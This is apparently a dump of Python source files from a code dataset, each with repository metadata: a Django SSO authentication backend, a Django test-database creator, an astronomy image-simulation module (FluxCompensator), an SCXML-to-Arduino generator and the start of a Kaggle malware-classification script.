logger.info('Replicate user with sso_id "{}" from remote backend'.format(sso_id))
# create local profile from SSO
backend_user = fetch_remote_user(sso_id=sso_id, encoded_jwt=encoded_jwt)
#backend_user_profile = backend_user['profile']
user = create_local_user_from_remote_backend(backend_user)
#if backend_user_profile.get('is_incomplete', False):
# redirect_to_profile_complete(user)
else:
user = None
return user
def try_update_user(self, sso_id, user, user_profile, encoded_jwt, decoded_jwt):
logger.debug('try_update_user')
rev_changed = user_profile.sso_rev < decoded_jwt['sso_rev']
if rev_changed:
if rev_changed:
logger.info('Rev changed from "{}" to "{}" for user "{}", updating ...'
.format(user_profile.sso_rev, decoded_jwt['sso_rev'],
user))
# local profile updated from django_sso_app instance, do not update sso_rev
setattr(user, '__dssoa__creating', True)
remote_user_object = fetch_remote_user(sso_id=sso_id, encoded_jwt=encoded_jwt)
user = update_local_user_from_remote_backend(user, remote_user_object)
logger.info('{} updated with latest data from BACKEND'.format(user))
setattr(user, '__dssoa__creating', False)
else:
logger.info('Nothing changed for user "{}"'.format(user))
return user
class DjangoSsoAppApiGatewayAppAuthenticationBackend(DjangoSsoAppAppBaseAuthenticationBackend):
"""
Authenticates by request CONSUMER_CUSTOM_ID header
"""
def try_replicate_user(self, request, sso_id, encoded_jwt, decoded_jwt):
user = super(DjangoSsoAppApiGatewayAppAuthenticationBackend, self).try_replicate_user(request, sso_id,
encoded_jwt, decoded_jwt)
if user is None:
logger.info('Creating user from headers')
user = create_local_user_from_apigateway_headers(request)
return user
def app_authenticate(self, request, consumer_custom_id, encoded_jwt, decoded_jwt):
logger.info('APP authenticating by apigateway consumer {}'.format(consumer_custom_id))
try:
sso_id = consumer_custom_id
profile = Profile.objects.get(sso_id=sso_id)
user = profile.user
except ObjectDoesNotExist:
logger.info('No profile with id "{}"'.format(sso_id))
try:
user = self.try_replicate_user(request, sso_id, encoded_jwt, decoded_jwt)
except Exception as e:
logger.exception('Can not replicate user: {}'.format(e))
raise
else:
if app_settings.REPLICATE_PROFILE:
logger.debug('Should replicate profile')
if decoded_jwt is None:
logger.warning('decoded_jwt not set')
return
user = self.try_update_user(sso_id, user, profile, encoded_jwt, decoded_jwt)
return user
class DjangoSsoAppJwtAppAuthenticationBackend(DjangoSsoAppAppBaseAuthenticationBackend):
"""
Authenticates by request jwt
"""
def try_replicate_user(self, request, sso_id, encoded_jwt, decoded_jwt):
user = super(DjangoSsoAppJwtAppAuthenticationBackend, self).try_replicate_user(request,
sso_id, encoded_jwt, decoded_jwt)
if user is None:
# create local profile from jwt
logger.info('Replicating user with sso_id "{}" from JWT'.format(sso_id))
user = create_local_user_from_jwt(decoded_jwt)
return user
def app_authenticate(self, request, encoded_jwt, decoded_jwt):
logger.info('backend authenticating by request jwt')
if encoded_jwt is None or decoded_jwt is None:
logger.debug('request jwt not set, skipping authentication')
return
try:
sso_id = decoded_jwt['sso_id']
profile = Profile.objects.get(sso_id=sso_id)
user = profile.user
if app_settings.REPLICATE_PROFILE:
logger.debug('try_update_user "{}" jwt consumer "{}"'.format(sso_id, sso_id))
user = self.try_update_user(sso_id, user, profile, encoded_jwt, decoded_jwt)
else:
# just updates user groups
logger.debug('Do not replicate profile')
except ObjectDoesNotExist:
try:
user = self.try_replicate_user(request, sso_id, encoded_jwt, decoded_jwt)
except Exception:
logger.exception('Can not replicate remote user')
raise
else:
if app_settings.REPLICATE_PROFILE:
logger.debug('Should replicate profile')
if decoded_jwt is None:
logger.warning('decoded_jwt not set')
raise
user = self.try_update_user(sso_id, user, profile, encoded_jwt, decoded_jwt)
return user
| 35.33526 | 120 | 0.625879 | 5,524 | 0.903648 | 0 | 0 | 0 | 0 | 0 | 0 | 1,161 | 0.189923 |
e2c4e8315ad036c2df5dd6cac8f7608bc7be1a30 | 768 | py | Python | tds_django/creation.py | cnanyi/tds-django | 45f32b064de1403a138f67fe944270d228988ec9 | [
"BSD-3-Clause"
] | 1 | 2021-11-23T04:23:43.000Z | 2021-11-23T04:23:43.000Z | tds_django/creation.py | cnanyi/tds-django | 45f32b064de1403a138f67fe944270d228988ec9 | [
"BSD-3-Clause"
] | 1 | 2022-01-14T09:21:04.000Z | 2022-01-25T18:06:35.000Z | tds_django/creation.py | cnanyi/tds-django | 45f32b064de1403a138f67fe944270d228988ec9 | [
"BSD-3-Clause"
] | 1 | 2021-11-23T04:24:00.000Z | 2021-11-23T04:24:00.000Z | from django.db.backends.base.creation import BaseDatabaseCreation
class DatabaseCreation(BaseDatabaseCreation):
def create_test_db(self, *args, **kwargs):
import os
db_name = super().create_test_db()
here = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
with self.connection.cursor() as cursor:
for f in ['init.sql', 'clr.sql']:
with open(f'{here}/sql/{f}', 'r') as file:
sql = file.read()
for s in sql.split('\nGO\n'):
cursor.execute(s)
return db_name
def sql_table_creation_suffix(self):
""" a lot of tests expect case sensitivity """
return 'COLLATE Latin1_General_100_CS_AS_SC '
| 34.909091 | 85 | 0.59375 | 699 | 0.910156 | 0 | 0 | 0 | 0 | 0 | 0 | 131 | 0.170573 |
e2c75223c441e931f761b5c72b816629ae0fb22c | 656 | py | Python | mbrl-tools/tests/small_acrobot/submissions/dummy_kit/generative_regressor.py | ramp-kits/rl_simulator | c651904b890c7e97cbb29ffae82e00a76788c88c | [
"BSD-3-Clause"
] | 11 | 2021-03-24T08:57:58.000Z | 2022-03-23T14:25:17.000Z | mbrl-tools/tests/small_acrobot/submissions/dummy_kit/generative_regressor.py | ramp-kits/rl_simulator | c651904b890c7e97cbb29ffae82e00a76788c88c | [
"BSD-3-Clause"
] | 1 | 2020-10-23T17:13:57.000Z | 2021-03-23T17:46:24.000Z | mbrl-tools/tests/small_acrobot/submissions/dummy_kit/generative_regressor.py | ramp-kits/rl_simulator | c651904b890c7e97cbb29ffae82e00a76788c88c | [
"BSD-3-Clause"
] | 1 | 2021-06-17T01:18:31.000Z | 2021-06-17T01:18:31.000Z | import numpy as np
from rampwf.utils import BaseGenerativeRegressor
class GenerativeRegressor(BaseGenerativeRegressor):
def __init__(self, max_dists, target_dim):
self.decomposition = 'autoregressive'
def fit(self, X_array, y_array):
pass
def predict(self, X_array):
# constant prediction with value equal to 10
n_samples = X_array.shape[0]
types = ['norm']
means = np.full(shape=(n_samples, 1), fill_value=10)
sigmas = np.zeros((n_samples, 1))
params = np.concatenate((means, sigmas), axis=1)
weights = np.ones((n_samples, 1))
return weights, types, params
| 28.521739 | 60 | 0.655488 | 584 | 0.890244 | 0 | 0 | 0 | 0 | 0 | 0 | 66 | 0.10061 |
e2c7ac772ba67bc802ebf29dae748fc6d17103e6 | 29,982 | py | Python | fluxcompensator/image.py | koepferl/FluxCompensator | 751cac08971845069da8c962bc83459f091ba0f8 | [
"BSD-2-Clause"
] | 9 | 2017-06-22T15:29:01.000Z | 2021-03-24T11:55:41.000Z | fluxcompensator/image.py | koepferl/FluxCompensator | 751cac08971845069da8c962bc83459f091ba0f8 | [
"BSD-2-Clause"
] | 1 | 2020-06-16T21:01:51.000Z | 2020-06-16T21:01:51.000Z | fluxcompensator/image.py | koepferl/FluxCompensator | 751cac08971845069da8c962bc83459f091ba0f8 | [
"BSD-2-Clause"
] | 5 | 2017-06-22T14:57:24.000Z | 2020-06-14T16:46:44.000Z | from copy import deepcopy
import os
ROOT = os.path.dirname(os.path.abspath(__file__)) + '/'
import numpy as np
from numpy.random import normal
from astropy import log as logger
from astropy.io import fits
from astropy.wcs import WCS
from .psf import GaussianPSF, FilePSF, FunctionPSF
from .utils.plot import MakePlots
from .utils.resolution import ConservingZoom, central
from .utils.tools import properties, grid_units, get_slices, average_collapse, central_wav
from .utils.units import ConvertUnits
class SyntheticImage(object):
'''
SyntheticImage is part the FluxCompensator. It converts
input_arrays (e. g. HYPERION ModelOutput in 2D) to "realistic" synthetic observations
(e. g. by accounting for PSF and noise).
It contains attributes like ModelOutput (see Notes).
If input_array is already a SyntheticImage object, the attributes are
passed. If input_array is not a SyntheticImage object, SyntheticImage
specific attributes are defined and then passed.
Parameters
----------
input_array : SyntheticImage, ModelOutput, optional
input_array also reads arrays with ModelOutput like properties.
unit_out : str, optional
The output units for SyntheticImage val. Valid options are:
* ``'ergs/cm^2/s'``
* ``'ergs/cm^2/s/Hz'``
* ``'Jy'``
* ``'mJy'``
* ``'MJy/sr'``
The default is ``'ergs/cm^2/s'``.
name : str
The name of the FluxCompensator object until another
input_array is called. The default is ``None``.
Attributes
----------
wav : numpy.ndarray
The wavelength of the val image in microns.
val : numpy.ndarray
The 2D image with shape (x, y).
units : str
Current units of the val image.
distance : str
Distance to the observed object in cm.
x_min : float
Physical offset from axis origin in FOV in cm.
x_max : float
Physical offset from axis origin in FOV in cm.
y_min : float
Physical offset from axis origin in FOV in cm.
y_max : float
Physical offset from axis origin in FOV in cm.
lon_min : float
Minimal longitudinal angle.
lon_max : float
Maximal longitudinal angle.
lat_min : float
Minimal latitudinal angle.
lat_max : float
Maximal latitudinal angle.
pix_area_sr : float
Pixel area per sr.
Notes
-----
unit_in : str
Unit of val in input_array. Valid options are:
* ``'ergs/cm^2/s'``
* ``'ergs/cm^2/s/Hz'``
* ``'Jy'``
* ``'mJy'``
* ``'MJy/sr'``
grid_unit : float
Physical unit of FOV axis in cm. Valid options are:
* ``au`` in cm
* ``pc`` in cm
* ``kpc`` in cm
grid_unit_name
Astronomical unit of FOV axis. Valid options are:
* ``'au'``
* ``'pc'``
* ``'kpc'``
FOV : tuple
Tuple ``FOV(x,y)`` of Field of View pixel entries:
* pixel in x direction: ``FOV[0]``
* pixel in y direction: ``FOV[1]``
name : str
The name of the FluxCompensator object until another
input_array is called. The default is ``None``.
stage : str
Gives current operation stage of SyntheticImage.
E. g. ``'SyntheticImage: convolve_PSF'``
log : list
List of strings of the previous and current stages.
filter : dict
Dictionary filter = ``{name, waf_0, waf_min, waf_max}``
of the applied filter:
* name of filter: ``filter['name']``
* central wavelength: ``filter['waf_0']``
* minimal wavelength: ``filter['waf_min']``
* maximal wavelength: ``filter['waf_max']``
Returns
-------
image : SyntheticImage
2D val array with SyntheticImage properties.
flux : SyntheticFlux
0D val array (scalar) with SyntheticFlux properties.
'''
def __init__(self, input_array, unit_out='ergs/cm^2/s', name=None):
# Hyperion ModelOutput attributes
#print input_array.val.ndim, input_array.val.shape[2]
#if input_array.val.ndim == 3 and input_array.val.shape[2] == 1:
#self.val = np.array(deepcopy(input_array.val[:,:,0]))
#if input_array.val.ndim == 2:
self.val = np.array(deepcopy(input_array.val))
#else:
# raise Exception('input_array does not have the right dimensions. numpy array of (x, y) or (x, y, 1) is required.')
self.wav = np.array(deepcopy(input_array.wav))
self.units = input_array.units
self.distance = input_array.distance
self.x_max = input_array.x_max
self.x_min = input_array.x_min
self.y_max = input_array.y_max
self.y_min = input_array.y_min
self.lon_min = input_array.lon_min
self.lon_max = input_array.lon_max
self.lat_min = input_array.lat_min
self.lat_max = input_array.lat_max
self.pix_area_sr = input_array.pix_area_sr
##################
# new attributes #
##################
from .cube import SyntheticCube
if isinstance(input_array, SyntheticImage) or isinstance(input_array, SyntheticCube):
# attributes with are passed, since input_array is SyntheticCube or SyntheticImage
# physical values
self.unit_in = input_array.unit_in
self.unit_out = input_array.unit_out
self.grid_unit = input_array.grid_unit
self.grid_unit_name = input_array.grid_unit_name
# properties of image
self.FOV = deepcopy(input_array.FOV)
# name
self.name = input_array.name
self.stage = input_array.stage
self.log = deepcopy(input_array.log)
# filter
self.filter = deepcopy(input_array.filter)
else: # attributes are defined, since input_array is NOT SyntheticCube or Image
# physical values
self.unit_in = input_array.units
self.unit_out = unit_out
self.grid_unit = grid_units(self.x_max - self.x_min)['grid_unit']
self.grid_unit_name = grid_units(self.x_max - self.x_min)['grid_unit_name']
self.FOV = (self.x_max - self.x_min, self.y_max - self.y_min)
# name
self.name = name
self.stage = 'SyntheticImage: initial'
self.log = [self.stage]
# filter
self.filter = {'name': None, 'waf_0': None, 'waf_min': None, 'waf_max': None}
# convert into val units into unit_out
s = ConvertUnits(wav=self.wav, val=self.val)
self.val = s.get_unit(in_units=self.unit_in, out_units=self.unit_out, input_resolution=self.resolution['arcsec'])
self.units = self.unit_out
def extinction(self, A_v, input_opacities=None):
'''
Accounts for reddening.
Parameters
----------
A_v : Value of the visible extinction.
input_opacities : ``None``, str
If ``None`` standard extinction law is used.
Otherwise a e. g. input_opacities.txt file can be passed
as a str to read an opacity file with column #1 wav in microns
and column #2 in cm^2/g.
Default is ``None``.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: extinction'
# read own extinction law
if input_opacities is None:
t = np.loadtxt(ROOT + 'database/extinction/extinction_law.txt')
else:
t = np.loadtxt(input_opacities)
wav_ext = t[:, 0]
k_lam = t[:, 1]
# wav_ext monotonically increasing
if wav_ext[0] > wav_ext[1]:
wav_ext = wav_ext[::-1]
k_lam = k_lam[::-1]
k_v = np.interp(0.550, wav_ext, k_lam)
# interpolate to get A_int for a certain wavelength
k = np.interp(self.wav, wav_ext, k_lam)
A_int_lam = A_v * (k / k_v)
# apply extinction law
val_ext = self.val * 10 ** (-0.4 * A_int_lam)
# return SimulateImage
i = SyntheticImage(self)
i.val = val_ext
i.stage = stage
i.log.append(i.stage)
return i
def change_resolution(self, new_resolution, grid_plot=None):
'''
Changes the resolution of val image.
Parameters
----------
new_resolution : Resolution which the val array should get in
``arcsec/pixel.``
grid_plot : ``None``, ``True``
If ``True`` old and new resolution is visualized in a plot.
Default is ``None``.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: change_resolution'
# debugging comment
logger.debug('-' * 70)
logger.debug(stage)
logger.debug('-' * 70)
logger.debug('total value before zoom : ' + str('%1.4e' % np.sum(self.val)) + ' ' + str(self.units))
# match resolution of psf and val slice
f = ConservingZoom(array=self.val, initial_resolution=self.resolution['arcsec'], new_resolution=new_resolution)
zoomed_val = f.zoom()
# average after changing resolution for MJy/sr
if self.units == 'MJy/sr' or self.units == 'Jy/arcsec^2':
# size of new pixel in units of old pixel
size = new_resolution ** 2 / self.resolution['arcsec'] ** 2
zoomed_val = zoomed_val / size
if grid_plot is not None:
f.zoom_grid(self.name)
# debugging comment
logger.debug('total val after zoom : ' + str('%1.4e' % np.sum(zoomed_val)) + ' ' + str(self.units))
# return SimulateCube
i = SyntheticImage(self)
i.val = zoomed_val
i.stage = stage
i.log.append(i.stage)
i.FOV = (f.len_nx / f.len_nrx * self.FOV[0], f.len_ny / f.len_nry * self.FOV[1])
return i
def central_pixel(self, dx, dy):
'''
Move array right and up to create a central pixel.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: central_pixel'
# match resolution of psf and val slice
ce = central(array=self.val, dx=dx, dy=dy)
len_x_old = float(self.pixel[0])
len_x_new = float(len(ce[:,0]))
len_y_old = float(self.pixel[1])
len_y_new = float(len(ce[0,:]))
old_FOV = self.FOV
new_FOV = (len_x_new / len_x_old * old_FOV[0], len_y_new / len_y_old * old_FOV[1])
# return SimulateCube
i = SyntheticImage(self)
i.val = ce
i.stage = stage
i.log.append(i.stage)
i.FOV = new_FOV
return i
def convolve_psf(self, psf):
'''
Convolves the val image with a PSF of choice.
Parameters
----------
psf : GaussianPSF, FilePSF, database, FunctionPSF
* GaussianPSF(self, diameter): Convolves val with Gaussian PSF.
* FilePSF(self, psf_file, condensed) : Reads PSF from input file.
* database : object
If PSF ``name_PSF`` from FluxCompensator database is used.
* FunctionPSF(self, psf_function, width): Convolves defined PSF.
2D val image of SyntheticImage.val convolved with PSF.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: convolve_PSF'
# debugging comments
if isinstance(psf, GaussianPSF):
logger.debug('-' * 70)
logger.debug(stage + 'with GaussianPSF')
logger.debug('-' * 70)
# convolve val with classes GaussianPSF, FilePSF and FunctionPSF
val = psf.convolve(wav=self.wav, array=self.val, resolution=self.resolution)
# return SyntheticImage
i = SyntheticImage(self)
i.stage = stage
i.log.append(i.stage)
i.val = np.array(val)
return i
def add_noise(self, mu_noise, sigma_noise, seed=None, diagnostics=None):
'''
Adds normal distributed noise to the val image of SyntheticImage.
Parameters
----------
mu_noise : float
Mean of the normal distribution.
Good choice: mu_noise = 0.
sigma_noise : float
Standard deviation of the normal distribution.
Good choice arround:
* ``'ergs/cm^2/s'`` : sigma_noise = 10.**(-13)
* ``'ergs/cm^2/s/Hz'`` : sigma_noise = 10.**(-26)
* ``'Jy'`` : sigma_noise = 10.**(-3)
* ``'mJy'`` : sigma_noise = 10.**(-1)
* ``'MJy/sr'`` : sigma_noise = 10.**(-10)
seed : float, ``None``
When float seed fixes the random numbers to a certain sequence in order to create reproducible results.
Default is ``None``.
diagnostics : truetype
When ``True`` noise array is stored in a fits file.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: add_noise'
if sigma_noise != 0. and sigma_noise != 0:
if seed is not None:
np.random.seed(seed=seed)
noise = normal(mu_noise, sigma_noise, self.pixel)
if sigma_noise == 0. or sigma_noise == 0:
noise = np.zeros(self.pixel)
# Get noise.fits file
if diagnostics is True:
fits.writeto(self.name + '_' + 'process-output_SI-noise.fits', noise, clobber=True)
# add noise if val is already collapsed (x, y)
val = self.val.copy() + noise
# return SyntheticImage
i = SyntheticImage(self)
i.stage = stage
i.log.append(i.stage)
i.val = np.array(val)
return i
def get_total_val(self):
'''
Collapses the val image of SyntheticImage into a 0D val array.
Returns
-------
flux : SyntheticFlux
'''
stage = 'SyntheticImage: get_total_val'
if self.unit_out == 'MJy/sr' or self.unit_out == 'Jy/arcsec^2':
s = ConvertUnits(wav=self.wav, val=self.val)
val = s.get_unit(in_units=self.units, out_units='Jy', input_resolution=self.resolution['arcsec'])
else: val = self.val
# collapse 2D image to a single scalar val
total_val = np.sum(val)
if self.unit_out == 'MJy/sr' or self.unit_out == 'Jy/arcsec^2':
s = ConvertUnits(wav=self.wav, val=total_val)
total_val = s.get_unit(in_units='Jy', out_units=self.unit_out, input_resolution=self.resolution['arcsec'] * self.pixel[0])
# return SyntheticFlux
from .flux import SyntheticFlux
f = SyntheticFlux(self)
f.log.append(stage)
f.stage = 'SyntheticFlux: initial'
f.log.append(f.stage)
f.val = np.array(total_val)
return f
def plot_image(self, prefix=None, name=None, multi_cut=None, single_cut=None, set_cut=None, dpi=None):
'''
Plots the val image of SyntheticImage. The wavelength interval
around the central wavelength labels the plot.
Parameters
----------
prefix : str
Name of the image. Default naming chain is switched off.
name : str
Name of image within the default naming chain to distinguish the
plot files. E. g. 'PSF_gaussian'
mulit_cut : ``True``, ``None``
* ``True`` : plots chosen image slice at cuts of [100, 99, 95, 90]%.
* ``None`` : no mulit-plot is returned.
Default is ``None``.
single_cut : float [0,100], ``None``
* float : cut level for single plot of image slice.
* ``None`` : no single plot is returned.
set_cut : tuple, ``None``
* tuple : set_cut(v_min, v_max)
Minimal and maximal physical val presented in the colorbars.
* ``None`` : no plot with minimal and maximal cut is returned.
Default is ``None``.
dpi : ``None``, scalar > 0
The resolution in dots per inch.
``None`` is default and will use the val savefig.dpi
in the matplotlibrc file.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: plot_image'
if prefix is None and name is None:
raise Exception('If prefix name is not given, you need to give the a name to enable the default naming chain.')
if prefix is not None:
if multi_cut is True and (single_cut is not None or set_cut is not None):
raise Exception('If prefix naming is enabled only one plotting option can be chosen.')
elif multi_cut is None and (single_cut is not None and set_cut is not None):
raise Exception('If prefix naming is enabled only one plotting option can be chosen.')
plot = MakePlots(prefix=prefix, name=name, input_array=SyntheticImage(self), multi_cut=multi_cut, single_cut=single_cut, set_cut=set_cut, dpi=dpi)
# return SyntheticImage
i = SyntheticImage(self)
i.stage = stage
i.log.append(i.stage)
return i
def add_to_observation(self, fits_file, name, position_pix=None, position_world=None, zero_edges=None):
'''
Blends the modeled realistic synthetic observation to a real observation in a fits file.
Parameters
----------
fits_file : str
fits_file of the observation.
name : str
Name of the output fits file.
position_pix : list, ``None``
Center position of the model in observation pixel coordinates.
Default is ``None``.
position_world : list, ``None``
Center position of the model in observation world coordinates.
Default is ``None``.
zero_edges : ``True``, ``None``
If ``True`` edges of model are normalized to zero.
Default is ``None``.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: add_to_observation'
# world coordinates from fits_file
w = WCS(fits_file)
if position_world is None and position_pix is None:
raise Exception('WARNING: Position of model center needs to be given either in world or pixel coordinates.')
if position_pix is not None:
pos = position_pix
p_x_pos, p_y_pos = pos[0], pos[1]
else:
pos = position_world
p_x_pos, p_y_pos = w.wcs_world2pix(pos[0], pos[1], 1)
# center position in pixel and adjust position in current grid
x_round = np.round(p_x_pos, 0)
x_int = int(p_x_pos)
y_round = np.round(p_y_pos, 0)
y_int = int(p_y_pos)
# even or odd
if len(self.val[0]) % 2 == 0 and len(self.val[1]) % 2 == 0:
pos = np.array([x_round, y_round])
else:
if x_int == int(x_round):
if y_int == int(y_round):
pos = np.array([x_round + 0.5, y_round + 0.5])
else:
pos = np.array([x_round + 0.5, y_round - 0.5])
else:
if y_int == int(y_round):
pos = np.array([x_round - 0.5, y_round + 0.5])
else:
pos = np.array([x_round - 0.5, y_round - 0.5])
# limits of model in observation
start_x = pos[0] - len(self.val[0]) / 2.
stop_x = pos[0] + len(self.val[0]) / 2.
start_y = pos[1] - len(self.val[1]) / 2.
stop_y = pos[1] + len(self.val[1]) / 2.
# normalized that edges are zero
if zero_edges is True:
model = self.val.copy() - np.min(self.val)
else:
model = self.val.copy()
# open fits_file
hdulist = fits.open(fits_file)
hdu = hdulist[0]
header = hdu.header
if np.allclose(np.abs(header['CDELT1'] * 3600), self.resolution['arcsec']) is not True:
raise Exception('WARNING: make sure that resolution of observation and model are the same! E. g. change resolution of FC_object first.')
image = hdu.data
# add model to observation
image[start_y:stop_y, start_x:stop_x] = image[start_y:stop_y, start_x:stop_x] + model
# store to name.fits file
fits.writeto(name + '.fits', image, clobber=True)
# return SyntheticImage
i = SyntheticImage(self)
i.stage = stage
i.log.append(i.stage)
return i
def add_field_stars(self, extinction_map, database=None, star_file=None, seed=None, ISMextinction=None):
'''
Adds field stars to synthetic image.
Parameters
----------
extinction_map : object
Created with ``fluxcompensator.utils.fieldstars.extract_extinction_map``.
database : dict, ``None``
Dictionary sets the parameters for field stars loaded for the respective
band from the built-in database.
dict = {'number':200, 'distance_range':[3*kpc, 50*kpc], 'ground': 0.02}
The dictionary is structured as follows:
* ``'number'`` : int in [0,288]
* ``'distance_range'`` : list
Distance lower and upper limit in units of cm
* ``'ground'`` : str, float
Distribution of stars before (``'foreground'``) or behind (``'background'``) the synthetic object.
When ``'ground'`` is a ``float`` in the limits of [0,1] then this is the fraction of foreground stars.
Default is ``None``.
star_file : str, ``None``
To load individual file with field stars in the format of (distance[pc], mag[band]).
Default is ``None``.
seed : int, ``None``
To create reproducible results for the positions of field stars.
Default is ``None``.
ISMextinction : float, ``None``
Optical extinction A_V along the line of sight in units mag/kpc.
Default is ``None``.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: add_field_stars'
# make sure resolution and PSF was not applied before
if 'SyntheticImage: convolve_PSF' in self.log or 'SyntheticCube: convolve_PSF' in self.log \
or 'SyntheticImage: change_resolution' in self.log \
or 'SyntheticCube: change_resolution' in self.log:
raise Exception('WARNING: Adding field stars should happen before changing resolution or convolution with PSF.')
# make sure that filter was applied before
if 'SyntheticCube: convolve_filter' not in self.log:
raise Exception('WARNING: Image must be convolved with the transmission of a detector.')
if extinction_map.shape != self.val.shape:
raise Exception('WARNING: Extinction map and val of SyntheticImage do not have the same dimension.')
# load file or give parameters to read from database
if database is None and star_file is None:
raise Exception('WARNING: Either database or star_file need to be different from None.')
# read from database
if database is not None:
from utils.fieldstars import get_stars_from_database
mag, star_distance = get_stars_from_database(band=self.filter['name'], number=database['number'],
distance_range=database['distance_range'], ground=database['ground'],
object_distance=self.distance, seed=seed)
# read field star data from file, distance in pc, mag in magnitudes
pc = 3.08568025e+18
if database is None and star_file is not None:
print 'CAUTION: only stars in the same band as the image should be loaded.'
print 'CAUTION: units of distance is in pc, stellar photometry in mag.'
f = np.loadtxt(star_file)
star_distance = f[:,0] * pc # pc>cm
mag = f[:,1]
# ensure that random numbers are the same every time
if seed is not None:
np.random.seed(seed)
#print star_distance - self.distance
# extinction from extinction map for objects
x = np.random.uniform(0, self.pixel[0], len(mag)).astype('int')
y = np.random.uniform(0, self.pixel[1], len(mag)).astype('int')
A_obj = extinction_map[x,y]
# convert to from A_v to A_filter
print 'CAUTION: Extinction law from Kim et al. is used.'
wav_ext, k_lam = np.loadtxt(ROOT + 'database/extinction/extinction_law.txt', unpack=True)
k_v = np.interp(0.550, wav_ext, k_lam)
k = np.interp(self.wav, wav_ext, k_lam)
A_filter = A_obj * (k / k_v)
MAG_ext = np.where([star_distance[i] >= self.distance for i in range(len(star_distance))], mag + A_filter, mag)
if ISMextinction is not None:
ISM_extinction_filter = ISMextinction * (k / k_v)
MAG_ext_ISM = np.where([star_distance[i] >= self.distance for i in range(len(star_distance))], MAG_ext + ISM_extinction_filter * star_distance/(1e3 * pc), MAG_ext)
#print mag[10], MAG_ext[10], MAG_ext_ISM[10]
MAG_ext = MAG_ext_ISM
# zero-point
import database.missions as filters
zero_point = getattr(filters, self.filter['name'] + '_ZERO')
wav_1D = np.ones(np.shape(MAG_ext))*self.wav
# converting mag to flux
flux = ConvertUnits(wav=wav_1D, val=MAG_ext)
if self.units == 'MJy/sr' or self.units == 'Jy/arcsec^2':
starflux = flux.get_unit(in_units='mag', out_units=self.units, zero_point=zero_point, input_resolution=self.resolution['arcsec'])
else:
starflux = flux.get_unit(in_units='mag', out_units=self.units, zero_point=zero_point)
# position of star on image
add_stellar_flux = self.val.copy()
for i in range(len(starflux)):
add_stellar_flux[x[i],y[i]] = add_stellar_flux[x[i],y[i]] + starflux[i]
# return SyntheticImage
i = SyntheticImage(self)
i.val = add_stellar_flux
i.stage = stage
i.log.append(i.stage)
return i
@property
def spacing_wav(self):
'''
The property spacing_wav estimates the width of the logarithmic
spaced wav entries.
'''
if self.wav.ndim != 0:
spacing_wav = np.log10(self.wav[0] / self.wav[-1]) / (len(self.wav) - 1)
else:
spacing_wav = None
return spacing_wav
@property
def pixel(self):
'''
The property pixel is a tuple which resembles the current pixel in a
val slice. ``pixel(x,y)`` are calls as follows:
``x = pixel[0]``
``y = pixel[1]``
'''
if self.val.ndim in (0, 1):
pixel = (None, None)
if self.val.ndim in (2, 3):
pixel = (self.val.shape[0], self.val.shape[1])
return pixel
@property
def shape(self):
'''
The property shape is a string, which resembles the current shape of
the val array.
scalar: ``'()'``
1D: ``'(wav)'``
2D: ``'(x, y)'``
3D: ``'(x, y , wav)'``
'''
if self.val.ndim == 0:
shape = '()'
if self.val.ndim == 1:
shape = '(wav)'
if self.val.ndim == 2:
shape = '(x, y)'
if self.val.ndim == 3:
shape = '(x, y, wav)'
return shape
@property
def resolution(self):
'''
The property resolution tells you the current resolution. If we are already
in the SED or val dimension everything is considered as one large pixel.
resolution in arcsec per pixel : ``resolution['arcsec']``
resolution in rad per pixel : ``resolution['rad']``
'''
resolution = {}
if self.pixel[0] is None:
resolution['rad'] = self.FOV[0] / 1. / self.distance
else:
resolution['rad'] = self.FOV[0] / self.pixel[0] / self.distance
resolution['arcsec'] = np.degrees(resolution['rad']) * 3600
return resolution
| 33.9547 | 175 | 0.550797 | 29,475 | 0.98309 | 0 | 0 | 2,006 | 0.066907 | 0 | 0 | 16,063 | 0.535755 |
e2c813723c1876d28ad71bddb2cb82d4afe3cc1c | 435 | py | Python | generator.py | madkira/SCXML_to_FSM_for_Arduino | 2e2443eca70ff6d5a8b8ac8c32b0c7e1d4440201 | [
"MIT"
] | 1 | 2020-05-13T23:03:19.000Z | 2020-05-13T23:03:19.000Z | generator.py | madkira/SCXML_to_FSM_for_Arduino | 2e2443eca70ff6d5a8b8ac8c32b0c7e1d4440201 | [
"MIT"
] | null | null | null | generator.py | madkira/SCXML_to_FSM_for_Arduino | 2e2443eca70ff6d5a8b8ac8c32b0c7e1d4440201 | [
"MIT"
] | 1 | 2019-01-20T12:46:37.000Z | 2019-01-20T12:46:37.000Z | #!/usr/bin/python
import argparse
from src.SCXML_Parser.Scxml_parsor import Scxml_parsor
from src.arduino_helper.generate_fsm import generate_fsm
parser = argparse.ArgumentParser()
parser.add_argument('-f', action='store', dest='file', type=str, required=False, default="fsm.xml")
inargs = parser.parse_args()
print ("Beginning of the arduino fsm generator")
parser = Scxml_parsor(inargs.file)
generate_fsm(parser)
print("End") | 22.894737 | 99 | 0.77931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 88 | 0.202299 |
e2c87ee36a16287beb7f717f937785ecfe37b5d0 | 769 | py | Python | data/external/repositories/145085/kaggle_Microsoft_Malware-master/kaggle_Microsoft_malware_full/rebuild_code.py | Keesiu/meta-kaggle | 87de739aba2399fd31072ee81b391f9b7a63f540 | [
"MIT"
] | 1 | 2015-11-08T05:19:43.000Z | 2015-11-08T05:19:43.000Z | microsoft malware/Malware_Say_No_To_Overfitting/kaggle_Microsoft_malware_small/rebuild_code.py | bikash/kaggleCompetition | c168f5a713305f6cf6ef41db60d8b1f4cdceb2b1 | [
"Apache-2.0"
] | null | null | null | microsoft malware/Malware_Say_No_To_Overfitting/kaggle_Microsoft_malware_small/rebuild_code.py | bikash/kaggleCompetition | c168f5a713305f6cf6ef41db60d8b1f4cdceb2b1 | [
"Apache-2.0"
] | 1 | 2019-12-04T08:23:33.000Z | 2019-12-04T08:23:33.000Z | import os,array
import pickle
import numpy as np
import sys
xid=pickle.load(open(sys.argv[1]))
asm_code_path=sys.argv[2]
train_or_test=asm_code_path.split('_')[-1]
X = np.zeros((len(xid),2000))
